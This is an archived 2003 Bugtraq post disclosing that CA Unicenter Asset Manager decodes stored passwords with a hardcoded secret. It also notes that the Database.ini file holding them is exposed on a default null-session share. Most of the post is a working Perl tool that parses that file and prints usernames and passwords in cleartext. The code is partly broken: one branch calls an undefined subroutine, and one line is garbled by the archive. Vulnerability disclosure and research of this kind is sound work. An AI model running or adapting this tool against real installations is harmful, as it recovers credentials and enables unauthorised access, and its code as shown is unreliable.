| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20030604152717.GA6674@bogus.net>
Date: Wed, 4 Jun 2003 16:27:17 +0100
From: Tor Houghton <info@...umo.com>
To: bugtraq@...urityfocus.com
Subject: CA Unicenter Password Recovery Tool
List,
The following can also be found at:
http://www.kufumo.com/releases/ca-passwordrecover.txt
Thanks,
Tor Houghton
;
$Id: ca-passwordrecover.txt,v 1.3 2003/05/20 10:46:51 torh Exp $
Computer Associates "Asset Manager" Password Recovery Tool
(c) 2003 Tor Houghton (th at kufumo dot com)
++Synopsis++
The Computer Associates' Unicenter Asset Manager(TM) software uses a stored
secret in order to decrypt stored passwords. Attached to this text is a tool
to decrypt these passwords.
++What++
(http://www3.ca.com/Solutions/Collateral.asp?CID=33237&ID=194)
Simply put, it is a data collector with extended privileges. It is comprised
of an "Engine" (and a database), one or more "Sectors", a "Console" and an
"Agent" for each device (Windows or UNIX) that is to be added to the asset
database (see fig 1).
[Console] +-------- [Agent]
| |
v v
[Database] <-- [Engine] --> [Sector] <-- [Agent]
|
+-------> [Sector] <-- [Agent]
^
|
+-------- [Agent]
(figure 1)
The arrows do not depict data flow, but transaction flow. For example, the
Agents do get data from the Sector (and deliver data to it), but the Agent
initiates this transaction.
The Engine issues jobs and collects results (both stored on the Sector) and
the Agent executes these.
On the whole, this looks like a nice design; you could easily firewall the
Engine, Console and Database from the rest of the network, for example.
However, the Sector is (by default) a NULLSESSION share, writable by anyone.
Anyway. This document is not about whether or not it is possible to compromise
any machine with an Agent on it through a Sector, but to release a password
recovery tool.
Here it is.
--
#!/usr/bin/perl
$version='ca-dbpwrecover 1.2 2003/03/19';
##
## (c) th at kufumo.com 2003
##
## this version was based on AMO Unicenter 3.2
##
## thanks to emf at kufumo.com and ssw at kufumo.com for help with the
## disassembly and helping to reverse the encoding algorithm! go daddy!
##
## can't find a suitable file?
##
## (a default installation has the file 'Database.ini' available via a
## nullsession share ("amdomain$") on the machine running the console/
## engine.)
##
##
$|=1;
##
$ironic_seed="NetCon"; ## we predict $ironic_seed will change
## in the next version of CA AMO etc.
$CRYPT="BP7xCtDQqA2EZWoFH6wSIJeMzdYLb9Vfm5uNO4cKRGT3kUX018apyghijlnrsv";
$CLEAR="ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz";
use Getopt::Long;
GetOptions("h",
"u=s" => \$uname,
"p=s" => \$pword,
"f=s" => \$file);
if($opt_h) {
print <<EOM;
$version (c) 2003 th at kufumo.com
usage: ca-dbpwrecover [-h] [-u <username>] [-p <passwd>] [-f <file>]
-h : this
-p : password (if not using files)
-u : username (if not using files)
-f : filename (e.g. 'ca-dbpwrecover -f Database.ini')
EOM
exit(1);
}
if($file) {
DecryptCAEncryption("","",$file);
} else {
if($pword && $uname) {
DecryptCADecryption($pword,$uname,"");
exit(0);
} else {
print "Not enough parameters. Try -h.\n";
exit(1);
}
}
exit();
sub DecryptCAEncryption {
my($pword,$uname,$file)=@_;
my($u,$c,$oa,$ob,$offset);
my(@crypt)=split(//,$CRYPT);
if($file) {
open(IN,$file) || die "error: failed to open $file: $!\n";
while(<IN>) {
if(/^UserName=\#(\S+)\s*$/) {$name=$1;}
if(/^Password=\#(\S+)\s*$/) {$pass=$1;}
}
close(IN);
}
$uname=$name if($name);
$pword=$pass if($pass);
@pass=split(//,$pword);
@user=split(//,$uname);
@nc=split(//,$ironic_seed);
print "Username: ";
$c=5;
for($u=0;$u<@user;$u++) {
## find occurrance of current char ($user[$u]) in cleartext
## keystring:
$_=$CLEAR;
while(m/$user[$u]/g) {
$oa=pos;
}
$oa++;
if($u<@nc) {
$_=$CRYPT;
while(m/$nc[$u]/g) {
$ob=pos;
}
$ob++;
$oa=$oa+($ob*-1);
} else {
$oa=$oa-$u+$c;
$c++;
}
while($oa<0) {
$oa=$oa+62;
}
while($oa>62) {
$oa=$oa-62;
}
$oa--;
push(@clear,$crypt[$oa-1-$u]);
}
foreach(@clear) {
print $_;
}
print "\n";
## who said reuse of code is a good thing?
## i think i failed class here. heck, did you want the tool or not?
##
print "Password: ";
$c=@...ar;
for($u=0;$u<@pass;$u++) {
## find occurrance of current char ($user[$u]) in cleartext
## keystring:
$_=$CLEAR;
while(m/$pass[$u]/g) {
$oa=pos;
}
$oa++;
if($u<@clear) {
$_=$CRYPT;
while(m/$clear[$u]/g) {
$ob=pos;
}
$ob++;
$oa=$oa+($ob*-1);
} else {
$oa=$oa-$u+$c-1;
$c++;
}
while($oa<0) {
$oa=$oa+62;
}
while($oa>62) {
$oa=$oa-62;
}
$oa--;
push(@cpass,$crypt[$oa-1-$u]);
}
foreach(@cpass) {
print $_;
}
print "\n";
}
Powered by blists - more mailing lists